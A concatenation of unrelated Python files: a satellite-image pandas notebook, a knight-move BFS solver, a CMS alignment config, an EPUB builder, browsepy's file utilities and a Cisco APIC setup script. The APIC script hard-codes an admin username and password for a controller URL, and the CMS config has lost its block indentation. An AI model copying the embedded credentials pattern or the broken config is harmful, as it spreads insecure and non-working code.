from matplotlib.colors import Normalize
from numpy import ma
fig,ax=plt.subplots(1,1,figsize=(12,12))
# Diverging palette with explicit colours for masked/over/under pixels.
colors=sns.color_palette('coolwarm')
pal=LinearSegmentedColormap.from_list('test',colors)
pal.set_bad('0.75') #75% grey
pal.set_over('r')
pal.set_under('k')
vmin= -5.
vmax= 5.
ch29 = np.rot90(file_dict['ch29'],2)
ch31 = np.rot90(file_dict['ch31'],2)
the_norm=Normalize(vmin=vmin,vmax=vmax,clip=False)
# Brightness-temperature difference, masking NaN pixels so they plot grey.
tdiff= ch29 - ch31
tdiff=ma.array(tdiff,mask=np.isnan(tdiff))
CS= ax.imshow(tdiff,cmap=pal,norm=the_norm)
cax=plt.colorbar(CS, ax = ax,extend='both')
cax.set_label('ch29 - ch31 brightnes temp (K)')
ax.set_title('TB 8 micron - TB 11 micron')
# ### For next Tuesday: check in a notebook that
#
# 1. Create a pandas Dataframe with 3 columns: phase, ch29, ch31 using rows
# 1100:1500 of the rotated image
#
# 2. Use groupby on the phase column to collect pixels with the same phase
#
# 3. Loop through each of the phases and calculate the mean ch29 and ch 31 values
# for that phase and the mean of the differences.
#
# 4. Write those results out as a new DataFrame with 5 columns (1 for each phase)
# and 1 row
# In[46]:
# Build a flat table (one row per pixel) from image rows 1100:1500.
the_slice=slice(1100,1500)
column_data = dict(phase=phase_rot[the_slice,:].ravel(),ch29=ch29[the_slice,:].ravel(),ch31=ch31[the_slice,:].ravel())
# In[82]:
df_satellite = pd.DataFrame(column_data)
out = phase_rot[the_slice,:].flat
print(type(out))
df_satellite.columns
# In[88]:
# Group pixel rows by cloud phase.
groups=df_satellite.groupby('phase')
the_groups = list(groups)
print(the_groups)
# In[89]:
# Per-channel, per-phase mean brightness temperature, then one single-row
# DataFrame per channel (columns = phases) plus their difference.
# NOTE(review): `data_frames` is assigned but never used.
data_frames=[]
chan_dict={}
for value in ['ch29','ch31']:
    chan_dict[value] = {}
    for phase, group in groups:
        #save the mean for each phase
        chan_dict[value][phase] = group[value].mean()
df_dict={}
for value in ['ch29','ch31']:
    temps=list(chan_dict[value].values())
    names = list(chan_dict[value].keys())
    df_dict[value] = pd.DataFrame.from_records([temps],columns=names)
df_dict['Tdiff'] = df_dict['ch31'] - df_dict['ch29']
# In[78]:
df_dict['Tdiff']
# ### For next week
#
# Check in a notebook that:
#
# 1) breaks the image into 16 subsets (4 x 4 in rows and columns)
#
# 2) write a function that produces a two new data frames for the the ch31 and ch31 - ch29 mean temperature
# that have a column for each phase and 16 rows, one for each subset.
#
# 3) Make a scatterplot with 4 symbols (one for each phase) that plots ch31 on the x axis and ch31 - ch29 on the y axis
# In[ ]:
| phaustin/A212 | notebooks/python/satellite_pandas.py | satellite_pandas.py | py | 5,014 | python | en | code | 2 | github-code | 13 |
12801156083 | from sys import stdin
from collections import deque
# BOJ 7562: minimum number of knight moves between two squares, via BFS.
T = int(stdin.readline())
# All eight "L"-shaped knight moves.
KNIGHT_MOVES = [(-2, -1), (-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2), (-1, -2)]
for _ in range(T):
    size = int(stdin.readline())
    start_r, start_c = map(int, stdin.readline().split())
    goal_r, goal_c = map(int, stdin.readline().split())
    # dist[r][c] stores BFS distance + 1, so 0 doubles as "unvisited".
    dist = [[0] * size for _ in range(size)]
    dist[start_r][start_c] = 1
    frontier = deque([(start_r, start_c)])
    while frontier:
        row, col = frontier.popleft()
        if (row, col) == (goal_r, goal_c):
            # Remove the +1 offset used to mark visited squares.
            print(dist[row][col] - 1)
            break
        for d_row, d_col in KNIGHT_MOVES:
            next_r = row + d_row
            next_c = col + d_col
            if 0 <= next_r < size and 0 <= next_c < size and not dist[next_r][next_c]:
                dist[next_r][next_c] = dist[row][col] + 1
                frontier.append((next_r, next_c))
9765762776 | ########## Configuration ##########
# if set to True, a file with logs will be produced.
produce_logs = False
# if set to True, the process will load the conditions input from an SQLite file.
# Otherwise, it will use ESSource.
conditions_input_from_db = False
# Input database. Used only if conditions_input_from_db is set to True.
input_conditions = 'sqlite_file:alignment_config.db'
# Database tag. Used only if conditions_input_from_db is set to True.
db_tag = 'PPSAlignmentConfig_test'
# Path for a ROOT file with the histograms
output_distributions = 'dqm_run_distributions_test.root'
###################################
import FWCore.ParameterSet.Config as cms
from input_files import input_files
from Configuration.StandardSequences.Eras import eras
process = cms.Process('TEST', eras.Run2_2017)
# set GT
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, "112X_dataRun2_v6")
process.load('FWCore.MessageService.MessageLogger_cfi')
process.load("CalibPPS.AlignmentGlobal.ppsAlignmentWorker_cfi")
process.ppsAlignmentWorker.debug = True
process.load("DQMServices.Core.DQMStore_cfi")
# Message Logger
if produce_logs:
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('run_distributions',
'cout'
),
run_distributions = cms.untracked.PSet(
threshold = cms.untracked.string("INFO")
),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
)
)
else:
process.MessageLogger = cms.Service("MessageLogger",
destinations = cms.untracked.vstring('cout'),
cout = cms.untracked.PSet(
threshold = cms.untracked.string('WARNING')
)
)
# Source
process.source = cms.Source("PoolSource",
fileNames = input_files
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(-1))
# raw-to-digi conversion
process.load("EventFilter.CTPPSRawToDigi.ctppsRawToDigi_cff")
# local RP reconstruction chain with standard settings
process.load("RecoPPS.Configuration.recoCTPPS_cff")
process.ctppsLocalTrackLiteProducer.tagDiamondTrack = ""
process.ctppsLocalTrackLiteProducer.includeDiamonds = False
# Event Setup
if not conditions_input_from_db:
from config import ppsAlignmentConfigESSource
process.ppsAlignmentConfigESSource = ppsAlignmentConfigESSource
else:
process.load("CondCore.CondDB.CondDB_cfi")
process.CondDB.connect = input_conditions
process.PoolDBESSource = cms.ESSource("PoolDBESSource",
process.CondDB,
DumbStat = cms.untracked.bool(True),
toGet = cms.VPSet(cms.PSet(
record = cms.string('PPSAlignmentConfigRcd'),
tag = cms.string(db_tag)
))
)
# Output for the histograms
process.dqmOutput = cms.OutputModule("DQMRootOutputModule",
fileName = cms.untracked.string(output_distributions)
)
process.load("DQM.Integration.config.environment_cfi")
process.dqmEnv.subSystemFolder = "CTPPS"
process.dqmEnv.eventInfoFolder = "EventInfo"
process.dqmSaver.path = ""
process.dqmSaver.tag = "CTPPS"
process.path = cms.Path(
process.ctppsRawToDigi
* process.recoCTPPS
* process.ppsAlignmentWorker
)
process.end_path = cms.EndPath(
process.dqmOutput
+ process.dqmEnv
+ process.dqmSaver
)
process.schedule = cms.Schedule(
process.path,
process.end_path
) | MatiXOfficial/pps-alignment-data | 2017/phys-version-1/fill_6300/placeholder/run_distributions_cfg.py | run_distributions_cfg.py | py | 3,528 | python | en | code | 0 | github-code | 13 |
2086947871 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2023/5/20
# @Author : chaocai
import os
from ebooklib import epub
from zhconv import zhconv
from service import config, log
# 构造epub,方法有些长懒得拆先这样吧
def build_epub(book_data):
try:
path = config.read('epub_dir') + book_data.site + '/' + book_data.title + '.epub'
if not os.path.exists(config.read('epub_dir') + book_data.site):
os.makedirs(config.read('epub_dir') + book_data.site)
log.info(book_data.title + ",开始生成epub...")
book = epub.EpubBook()
# 元数据
book.set_identifier(book_data.id)
book.set_title(book_data.title)
book.set_language('cn')
if book_data.author:
book.add_author(book_data.author)
if book_data.introduction:
description = '\n'.join(book_data.introduction)
description = zhconv.convert(description, 'zh-hans') if config.read('convert_hans') else description
book.add_metadata('DC', 'description', description)
book.add_metadata('DC', 'source', book_data.site)
book.add_metadata('DC', 'rights', '本电子书由lightnovel-pydownloader制作生成,仅供个人使用,不得对外传播以及用于商业用途。')
if book_data.tags:
book.add_metadata('DC', 'subject', ','.join(book_data.tags))
if book_data.cover:
# 设置封面
book.set_cover("cover.jpg", open(book_data.cover[0], 'rb').read())
# 章节
chapters = book_data.chapter
if chapters:
book_chapters = []
for chapter_data in chapters:
chapter = epub.EpubHtml(title=chapter_data.title,
file_name=chapter_data.id + '_' + chapter_data.title + '.xhtml', lang='cn')
content = '\n'.join(chapter_data.content)
content = zhconv.convert(content, 'zh-hans') if config.read('convert_hans') else content
if config.read('least_words') > 0 and len(content) < config.read('least_words') \
and not chapter_data.pic:
continue
content_list = ['<p>' + item + '</p>' for item in content.split('\n')]
if chapter_data.pic:
for pic in chapter_data.pic:
image_content = open(pic, "rb").read()
if config.read('least_pic') > 0 and len(image_content) < config.read('least_pic'):
continue
image_name = pic.replace('\\', '/').split('/')[-1]
image_type = image_name.split('.')[-1]
image = epub.EpubImage(uid=image_name, file_name='Image/' + image_name,
media_type='image/' + image_type, content=image_content)
book.add_item(image)
# 章节末尾插入图片
content_list.append('<img src="%s"/>' % ('../Image/' + image_name))
chapter.content = ''.join(content_list)
book.add_item(chapter)
book_chapters.append(chapter)
# 目录和书脊
if book_chapters:
book.toc = book_chapters
book.spine = book_chapters
book.add_item(epub.EpubNcx())
book.add_item(epub.EpubNav())
# css
style = 'body { font-family: Times, Times New Roman, serif; }'
nav_css = epub.EpubItem(uid="style_nav", file_name="style/nav.css",
media_type="text/css", content=style)
book.add_item(nav_css)
# 保存
epub.write_epub(path, book)
log.info('epub已导出!')
except:
pass
| ilusrdbb/lightnovel-pydownloader | service/epub.py | epub.py | py | 3,835 | python | en | code | 12 | github-code | 13 |
9075804676 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
import sys
import os
import os.path
import re
import shutil
import codecs
import threading
import string
import tarfile
import random
import datetime
import functools
from flask import current_app, send_from_directory, Response
from werkzeug.utils import cached_property
from sqlalchemy.exc import SQLAlchemyError
from .compat import PY_LEGACY, range
from .models import Metadata
from . import db
# Name (sic: "undescore") of a custom codecs error handler that replaces
# each unencodable character with '_' and resumes one position later.
undescore_replace = '%s:underscore' % __name__
codecs.register_error(undescore_replace,
                      (lambda error: (u'_', error.start + 1))
                      if PY_LEGACY else
                      (lambda error: ('_', error.start + 1))
                      )
if not PY_LEGACY:
    unicode = str  # alias so Python-2-style unicode() calls keep working
# Process-wide cache of Metadata rows keyed by filesystem path.
# NOTE(review): entries are never invalidated, so size/description changes
# made by other processes will not be seen until restart.
allMetadata = {}
class File(object):
    """Wrap a filesystem path (file or directory) for the browsing app.

    Each instance binds an absolute ``path`` to a Flask ``app`` and to its
    ``Metadata`` database row, which is cached process-wide in
    ``allMetadata`` keyed by path.
    """
    re_charset = re.compile('; charset=(?P<charset>[^;]+)')
    parent_class = None # none means current class
    def __init__(self, path=None, app=None):
        self.path = path
        self.app = current_app if app is None else app
        # Look the Metadata row up in the process-wide cache first and fall
        # back to the database on a miss.
        # NOTE(review): the bare except also swallows database errors from
        # the query path; `except KeyError` would be the intended miss case.
        try:
            self.meta = allMetadata[self.path]
        except:
            self.meta = Metadata.query.filter_by(path=self.path).one()
            allMetadata.update({self.meta.path:self.meta})
    def remove(self):
        # Delete this node from disk; directories are removed recursively.
        if not self.can_remove:
            raise OutsideRemovableBase("File outside removable base")
        if self.is_directory:
            shutil.rmtree(self.path)
        else:
            os.unlink(self.path)
    def download(self):
        # Directories are streamed as an on-the-fly tar archive; plain
        # files are served as attachments.
        if self.is_directory:
            stream = TarFileStream(
                self.path,
                self.app.config["directory_tar_buffsize"]
            )
            return Response(stream, mimetype="application/octet-stream")
        directory, name = os.path.split(self.path)
        return send_from_directory(directory, name, as_attachment=True)
    def contains(self, filename):
        # True when `filename` exists directly inside this directory.
        return os.path.exists(os.path.join(self.path, filename))
    def choose_filename(self, filename, attempts=999):
        # Return `filename` or a non-clashing variant: numbered suffixes
        # first, random suffixes once `attempts` is exhausted.
        new_filename = filename
        for attempt in range(2, attempts+1):
            if not self.contains(new_filename):
                return new_filename
            new_filename = alternative_filename(filename, attempt)
        while self.contains(new_filename):
            new_filename = alternative_filename(filename)
        return new_filename
    def get_dir_size(self):
        # Walk the whole subtree and add up file sizes (can be slow on big
        # trees; results are persisted via update_db_size()).
        total_size = 0
        for dirpath, dirnames, filenames in os.walk(self.path):
            for f in filenames:
                fp = os.path.join(dirpath, f)
                total_size += os.path.getsize(fp)
        return total_size
    @property
    def plugin_manager(self):
        # Plugin manager registered by the Flask extension machinery.
        return self.app.extensions['plugin_manager']
    @property
    def default_action(self):
        # First plugin action placed as a 'link' wins; otherwise fall back
        # to browse (directories) or open (files).
        for action in self.actions:
            if action.widget.place == 'link':
                return action
        endpoint = 'browse' if self.is_directory else 'open'
        widget = self.plugin_manager.link_class.from_file(self)
        return self.plugin_manager.action_class(endpoint, widget)
    @cached_property
    def actions(self):
        return self.plugin_manager.get_actions(self)
    @property
    def can_download(self):
        # Directories above MAX_DIR_DL_SIZE are never downloadable.
        if self.meta.size > self.app.config["MAX_DIR_DL_SIZE"] and self.is_directory:
            return False;
        return self.app.config['directory_downloadable'] or not self.is_directory
    @cached_property
    def can_remove(self):
        dirbase = self.app.config["directory_remove"]
        if dirbase:
            return self.path.startswith(dirbase + os.sep)
        return False
    @cached_property
    def can_upload(self):
        dirbase = self.app.config["directory_upload"]
        if self.is_directory and dirbase:
            return dirbase == self.path or self.path.startswith(dirbase + os.sep)
        return False
    @cached_property
    def stats(self):
        return os.stat(self.path)
    @cached_property
    def mimetype(self):
        if self.is_directory:
            return 'inode/directory'
        return self.plugin_manager.get_mimetype(self.path)
    @cached_property
    def is_directory(self):
        return os.path.isdir(self.path)
    @cached_property
    def is_file(self):
        return os.path.isfile(self.path)
    @cached_property
    def is_empty(self):
        return not self.raw_listdir
    @cached_property
    def parent(self):
        # The configured directory base is the root and has no parent.
        if self.path == self.app.config['directory_base']:
            return None
        parent_class = self.parent_class or self.__class__
        return parent_class(os.path.dirname(self.path), self.app)
    @cached_property
    def ancestors(self):
        # Chain of parents from the immediate parent up to the root.
        ancestors = []
        parent = self.parent
        while parent:
            ancestors.append(parent)
            parent = parent.parent
        return tuple(ancestors)
    @cached_property
    def raw_listdir(self):
        return os.listdir(self.path)
    @property
    def modified(self):
        # Last-modification time formatted for display.
        return datetime.datetime.fromtimestamp(self.stats.st_mtime).strftime('%Y.%m.%d %H:%M:%S')
    def print_size(self, rawsize):
        # Human-readable size; whole bytes are shown without decimals.
        size, unit = fmt_size(rawsize, self.app.config["use_binary_multiples"])
        if unit == binary_units[0]:
            return "%d %s" % (size, unit)
        return "%.2f %s" % (size, unit)
    def get_rawsize(self):
        rawsize = 0
        if self.is_file:
            rawsize = self.stats.st_size
        if self.is_directory:
            rawsize = self.get_dir_size()
        return rawsize
    def update_db_size(self, meta):
        # Persist a freshly computed size (and timestamp) for `meta`.
        meta.size = self.get_rawsize()
        meta.size_date = datetime.datetime.now()
        db.session.add(meta)
        db.session.commit()
        return meta
    @cached_property
    def size(self):
        # NOTE(review): the disabled branch below refreshed sizes older
        # than 21 days (and references a stale bare `meta` name); currently
        # the stored Metadata size is always trusted as-is.
        #if self.meta.size and self.meta.size_date:
        #    if datetime.datetime.now() < self.meta.size_date + datetime.timedelta(days=21):
        #        return self.print_size(self.meta.size)
        #    else:
        #        self.meta = self.update_db_size(meta)
        #        return self.print_size(self.meta.size)
        #else:
        #    self.meta = self.update_db_size(self.meta)
        #    return self.print_size(self.meta.size)
        return self.print_size(self.meta.size)
    @property
    def urlpath(self):
        return abspath_to_urlpath(self.path, self.app.config['directory_base'])
    @property
    def name(self):
        return os.path.basename(self.path)
    @property
    def type(self):
        # Mimetype without an optional '; charset=...' suffix.
        return self.mimetype.split(";", 1)[0]
    @cached_property
    def description(self):
        # NOTE(review): bare except hides attribute/database errors.
        try:
            return self.meta.desc
        except:
            return None
    @property
    def encoding(self):
        # Charset parsed out of the mimetype string, or "default".
        if ";" in self.mimetype:
            match = self.re_charset.search(self.mimetype)
            gdict = match.groupdict() if match else {}
            return gdict.get("charset") or "default"
        return "default"
    def listdir(self):
        # Children as File instances: optionally filtered by the
        # 'directory_ignore' config, files first, then directories, each
        # group sorted by lowercased name.
        app = current_app
        try:
            ignored=app.config['directory_ignore']
        except KeyError:
            ignored = None
        path_joiner = functools.partial(os.path.join, self.path)
        content = [
            self.__class__(path=path_joiner(path), app=self.app)
            for path in self.raw_listdir
        ]
        filtered_content = content
        if ignored:
            filtered_content = [c for c in content if c.name not in ignored]
        filtered_content.sort(key=lambda f: (f.is_directory, f.name.lower()))
        return filtered_content
    @classmethod
    def from_urlpath(cls, path, app=None):
        # Alternate constructor: build a File from an URL-style relative
        # path under the app's directory base.
        app = app or current_app
        base = app.config['directory_base']
        return cls(path=urlpath_to_abspath(path, base), app=app)
class TarFileStream(object):
    '''
    Tarfile which compresses while reading for streaming.

    A producer thread tars `path` into this object (which poses as the
    tarfile's output file via `write`), while the consumer pulls chunks out
    through `read`/iteration; two events hand control back and forth so
    only one side runs at a time.

    Buffsize can be provided, it must be 512 multiple (the tar block size)
    for compression.
    '''
    event_class = threading.Event
    thread_class = threading.Thread
    tarfile_class = tarfile.open
    def __init__(self, path, buffsize=10240):
        self.path = path
        self.name = os.path.basename(path) + ".tar"
        # 0 = producing, 1 = tar finished, 2 = EOF already signalled.
        self._finished = 0
        self._want = 0
        self._data = bytes()
        self._add = self.event_class()  # consumer wants more data
        self._result = self.event_class()  # data (or EOF) is available
        self._tarfile = self.tarfile_class(fileobj=self, mode="w|", bufsize=buffsize) # stream write
        self._th = self.thread_class(target=self.fill)
        self._th.start()
    def fill(self):
        # Producer thread: archive the whole tree, then flag completion.
        self._tarfile.add(self.path, "")
        self._tarfile.close() # force stream flush
        self._finished += 1
        if not self._result.is_set():
            self._result.set()
    def write(self, data):
        # Called by tarfile from the producer thread: wait until the
        # consumer asks for data, buffer it, and hand control back once
        # enough bytes have accumulated.
        self._add.wait()
        self._data += data
        if len(self._data) > self._want:
            self._add.clear()
            self._result.set()
        return len(data)
    def read(self, want=0):
        # Consumer side; want=0 means "whatever is buffered".
        if self._finished:
            if self._finished == 1:
                self._finished += 1
                return ""
            # NOTE(review): this *returns* (not raises) an EOFError
            # instance; callers expecting an exception never see one.
            return EOFError("EOF reached")
        # Thread communication
        self._want = want
        self._add.set()
        self._result.wait()
        self._result.clear()
        if want:
            data = self._data[:want]
            self._data = self._data[want:]
        else:
            data = self._data
            self._data = bytes()
        return data
    def __iter__(self):
        # Yield chunks until read() returns a falsy value ("" at EOF).
        data = self.read()
        while data:
            yield data
            data = self.read()
class OutsideDirectoryBase(Exception):
    """Raised when a path resolves outside the configured directory base."""
    pass
class OutsideRemovableBase(Exception):
    """Raised when trying to remove a file outside the removable base."""
    pass
binary_units = ("B", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB")
standard_units = ("B", "KB", "MB", "GB", "TB", "PB", "EB", "ZB", "YB")
def fmt_size(size, binary=False):
    '''
    Get size and unit.

    :param size: size in bytes
    :param binary: whether to use binary (1024-based) or standard
                   (1000-based) multiples, defaults to False
    :return: size scaled into the chosen unit, and the unit name
    :rtype: tuple of number and str
    '''
    if binary:
        fmt_sizes = binary_units
        fmt_divider = 1024.
    else:
        fmt_sizes = standard_units
        fmt_divider = 1000.
    for fmt in fmt_sizes[:-1]:
        # Stop as soon as the value fits below one step of the multiplier.
        # (The original compared against a hard-coded 1000 even in binary
        # mode, so e.g. 1010 bytes was reported as "0.99 KiB".)
        if size < fmt_divider:
            return (size, fmt)
        size /= fmt_divider
    return size, fmt_sizes[-1]
def relativize_path(path, base, os_sep=os.sep):
    '''
    Make absolute path relative to an absolute base.

    :param path: absolute path
    :param base: absolute base path
    :param os_sep: path component separator, defaults to current OS separator
    :return: relative path
    :rtype: str or unicode
    :raises OutsideDirectoryBase: if path is not below base
    '''
    if not check_under_base(path, base, os_sep):
        raise OutsideDirectoryBase("%r is not under %r" % (path, base))
    # Strip the base (plus one separator when the base does not already end
    # with one) from the front of the path.
    skip = len(base) if base.endswith(os_sep) else len(base) + len(os_sep)
    return path[skip:]
def abspath_to_urlpath(path, base, os_sep=os.sep):
    '''
    Make filesystem absolute path uri relative using given absolute base path.

    :param path: absolute path
    :param base: absolute base path
    :param os_sep: path component separator, defaults to current OS separator
    :return: relative uri
    :rtype: str or unicode
    :raises OutsideDirectoryBase: if resulting path is not below base
    '''
    relative = relativize_path(path, base, os_sep)
    return relative.replace(os_sep, '/')
def urlpath_to_abspath(path, base, os_sep=os.sep):
    '''
    Make uri relative path fs absolute using a given absolute base path.

    :param path: relative path
    :param base: absolute base path
    :param os_sep: path component separator, defaults to current OS separator
    :return: absolute path
    :rtype: str or unicode
    :raises OutsideDirectoryBase: if resulting path is not below base
    '''
    if base.endswith(os_sep):
        prefix = base
    else:
        prefix = base + os_sep
    # Normalize to an absolute path so '..' components cannot escape `base`.
    realpath = os.path.abspath(prefix + path.replace('/', os_sep))
    if realpath == base or realpath.startswith(prefix):
        return realpath
    raise OutsideDirectoryBase("%r is not under %r" % (realpath, base))
common_path_separators = '\\/'
def generic_filename(path):
    '''
    Extract filename of given path os-indepently, taking care of known path
    separators.

    :param path: path
    :return: filename
    :rtype: str or unicode (depending on given path)
    '''
    # Keep only what follows the last separator of each known flavour.
    for sep in common_path_separators:
        _, sep_found, tail = path.rpartition(sep)
        if sep_found:
            path = tail
    return path
restricted_chars = '\\/\0'
def clean_restricted_chars(path, restricted_chars=restricted_chars):
    '''
    Get path without restricted characters.

    :param path: path
    :return: path without restricted characters
    :rtype: str or unicode (depending on given path)
    '''
    # Fold each restricted character into '_' one substitution at a time.
    return functools.reduce(
        lambda cleaned, character: cleaned.replace(character, '_'),
        restricted_chars,
        path)
restricted_names = ('.', '..', '::', os.sep)
nt_device_names = ('CON', 'AUX', 'COM1', 'COM2', 'COM3', 'COM4', 'LPT1', 'LPT2', 'LPT3', 'PRN', 'NUL')
fs_encoding = 'unicode' if os.name == 'nt' else sys.getfilesystemencoding() or 'ascii'
def check_forbidden_filename(filename, destiny_os=os.name, fs_encoding=fs_encoding,
                             restricted_names=restricted_names):
    '''
    Get if given filename is forbidden for current OS or filesystem.

    :param filename: filename to validate
    :param destiny_os: destination operative system
    :param fs_encoding: destination filesystem filename encoding
    :return: whether given filename is forbidden on given OS (or filesystem)
    :rtype: bool
    '''
    # Windows reserves device names such as CON or COM1 (with or without an
    # extension, in any letter case).
    if destiny_os == 'nt' and filename.split('.', 1)[0].upper() in nt_device_names:
        return True
    return filename in restricted_names
def check_under_base(path, base, os_sep=os.sep):
    '''
    Check if given absolute path is under given base.

    :param path: absolute path
    :param base: absolute base path
    :return: whether file is under given base or not
    :rtype: bool
    '''
    if path == base:
        return True
    # Appending a separator to the prefix keeps '/foo' from matching
    # '/foobar'.
    return path.startswith(base if base.endswith(os_sep) else base + os_sep)
def secure_filename(path, destiny_os=os.name, fs_encoding=fs_encoding):
    '''
    Get rid of parent path components and special filenames.

    If path is invalid or protected, return empty string.

    :param path: unsafe path
    :param destiny_os: destination operative system
    :param fs_encoding: destination filesystem filename encoding
    :return: filename or empty string
    :rtype: str or unicode (depending on python version, destiny_os and fs_encoding)
    '''
    path = generic_filename(path)
    path = clean_restricted_chars(path)
    if check_forbidden_filename(path, destiny_os=destiny_os, fs_encoding=fs_encoding):
        return ''
    if fs_encoding != 'unicode':
        # Round-trip through the filesystem encoding, replacing anything it
        # cannot represent with '_' (the custom `undescore_replace` handler
        # registered at module import); latin-1 maps Python 2 byte strings
        # 1:1 onto code points before encoding.
        if PY_LEGACY and not isinstance(path, unicode):
            path = unicode(path, encoding='latin-1')
        path = path.encode(fs_encoding, errors=undescore_replace).decode(fs_encoding)
    return path
fs_safe_characters = string.ascii_uppercase + string.digits
def alternative_filename(filename, attempt=None):
    '''
    Generates an alternative version of given filename.

    If a number attempt parameter is given, it will be used on the
    alternative name; a random value will be used otherwise.

    :param filename: original filename
    :param attempt: optional attempt number, defaults to None
    :return: new filename
    :rtype: str or unicode
    '''
    # Split off up to two extensions so 'archive.tar.gz' keeps '.tar.gz'.
    parts = filename.rsplit('.', 2)
    name = parts[0]
    suffix = ''.join('.%s' % extension for extension in parts[1:])
    if attempt is None:
        tag = ' ' + ''.join(random.choice(fs_safe_characters) for _ in range(8))
    else:
        tag = ' (%d)' % attempt
    return name + tag + suffix
| process-project/UC3-Portal_fork | browsepy/file.py | file.py | py | 15,912 | python | en | code | null | github-code | 13 |
12798436491 | import pprint
# Pretty-printer for debugging dumps of the configuration structures below.
pp = pprint.PrettyPrinter(indent=4)
# APIC Login Data
# SECURITY(review): controller credentials are hard-coded in source control;
# load them from environment variables or a secrets store before sharing.
APIC_URL = "https://15.186.7.16/"
APIC_USERNAME = "admin"
APIC_PASSWORD = "password"
# NOTE: Objects you don't want to create? Just mark them out
# Common variables for both Fabric Access Policies and VM Networking
# L2_INTERFACE_POLICIES = [
# {
# "name": "PerPort-VLAN_L2_IP",
# "descr": "",
# "qinq": "disabled",
# "reflectiveRelay": "disabled",
# "vlanScope": "portlocal"
# }
# ]
#
# LLDP_INTERFACE_POLICIES = [
# {
# "name": "LLDP-Enable-Bidirection",
# "adminRxSt": "enabled",
# "adminTxSt": "enabled",
# "descr": "",
# "nameAlias": ""
# }
# ]
#
# CDP_INTERFACE_POLICIES = [
# {
# "name": "Disable-CDP",
# "descr": "",
# "nameAlias": "",
# "adminSt": "disabled"
# }
# ]
#
# PORT_CHANNEL_INTERFACE_POLICIES = [
# {
# "name": "LACP-Active",
# "descr": "",
# "nameAlias": "",
# "mode": "active",
# "ctrl": "fast-sel-hot-stdby,graceful-conv,susp-individual",
# "minLinks": "1",
# "maxLinks": "16"
# }
# ]
VLAN_POOLS_8_COUNTS_10_TO_1000 = [
{
"name": "Eagle10-5ME-CL10_vlan_10-200",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "10",
"endVlan": "200"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_201-300",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "201",
"endVlan": "300"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_301-400",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "301",
"endVlan": "400"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_401-500",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "401",
"endVlan": "500"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_501-600",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "501",
"endVlan": "600"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_601-700",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "601",
"endVlan": "700"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_701-800",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "701",
"endVlan": "800"
}
]
},
{
"name": "Eagle10-5ME-CL10_vlan_801-1000",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "801",
"endVlan": "900"
},
{
"startVlan": "901",
"endVlan": "1000"
}
]
}
]
VLAN_POOLS_1_COUNT_10_TO_1000 = [
{
"name": "Eagle10-5ME-CL10_vlan_10-1000",
"encapType": "vlan",
"allocMode": "static",
"ranges": [
{
"startVlan": "10",
"endVlan": "200"
},
{
"startVlan": "201",
"endVlan": "300"
},
{
"startVlan": "301",
"endVlan": "400"
},
{
"startVlan": "401",
"endVlan": "500"
},
{
"startVlan": "501",
"endVlan": "600"
},
{
"startVlan": "601",
"endVlan": "700"
},
{
"startVlan": "701",
"endVlan": "800"
},
{
"startVlan": "801",
"endVlan": "900"
},
{
"startVlan": "901",
"endVlan": "1000"
}
]
}
]
VLAN_POOLS = VLAN_POOLS_1_COUNT_10_TO_1000
# VM Networking
# VCENTER_DOMAINS = [
# {
# "name": "vDS_ESXi-jason",
# aka epRetTime
# "endPointRetentionTime": "0",
# aka vmmCtrlrP
# "vCenterController": [
# {
# "name": "OV-VC1-jason",
# "hostOrIp": "15.186.9.63",
# "dvsVersion": "unmanaged",
# "rootContName": "ESXI_DATACENTER-jason",
# aka n1kvStatsMode
# "statsCollection": "enabled",
# aka vmmUsrAccP
# "vmmCredential" : {
# "name": "JasonPernito",
# "descr": "",
# aka usr
# "userName": "jpernito",
# aka pwd
# "password": "password"
# }
# }
# ],
# aka aaaDomainRef
# "securityDomains": [],
# "vlanPool": VLAN_POOLS[0],
# aka vmmVSwitchPolicyCont
# "vSwitchPolicies": {
# aka vmmRsVswitchOverrideLacpPol
# "portChannelPolicy": "LACP-Active-jason",
# aka vmmRsVswitchOverrideLldpIfPol
# "lldpPolicy": "LLDP-Enable-Bidirection-jason",
# vmmRsVswitchOverrideCdpIfPol
# "cdpPolicy": "Disable-CDP-jason"
# },
# "attachableEntityProfile": "Eagle10-5ME-CL10-jason_attachableAEP"
# }
# ]
#
# Fabric
PHYSICAL_DOMAINS = [
{
"name": "Eagle10-5ME-CL10-PD_10-TO-1000",
"vlanPool": VLAN_POOLS[0]
}
]
AAEPS = [
{
"name": "Eagle10-5ME-CL10_attachableAEP",
"physicalDomain": PHYSICAL_DOMAINS[0]['name']
}
]
POLICY_GROUPS = [
{
"name": "Eagle10-5ME-CL10_accPortGrp",
"aepName": AAEPS[0]['name'],
"cdpPolicy": "Disable-CDP",
"lldpPolicy": "LLDP-Enable-Bidirection",
"l2Policy": "PerPort-VLAN_L2_IP",
"type": "accessPort"
},
{
"name": "Eagle10-5ME-CL10_vpcPolicyGrp",
"aepName": AAEPS[0]['name'],
"cdpPolicy": "Disable-CDP",
"lldpPolicy": "LLDP-Enable-Bidirection",
"l2Policy": "PerPort-VLAN_L2_IP",
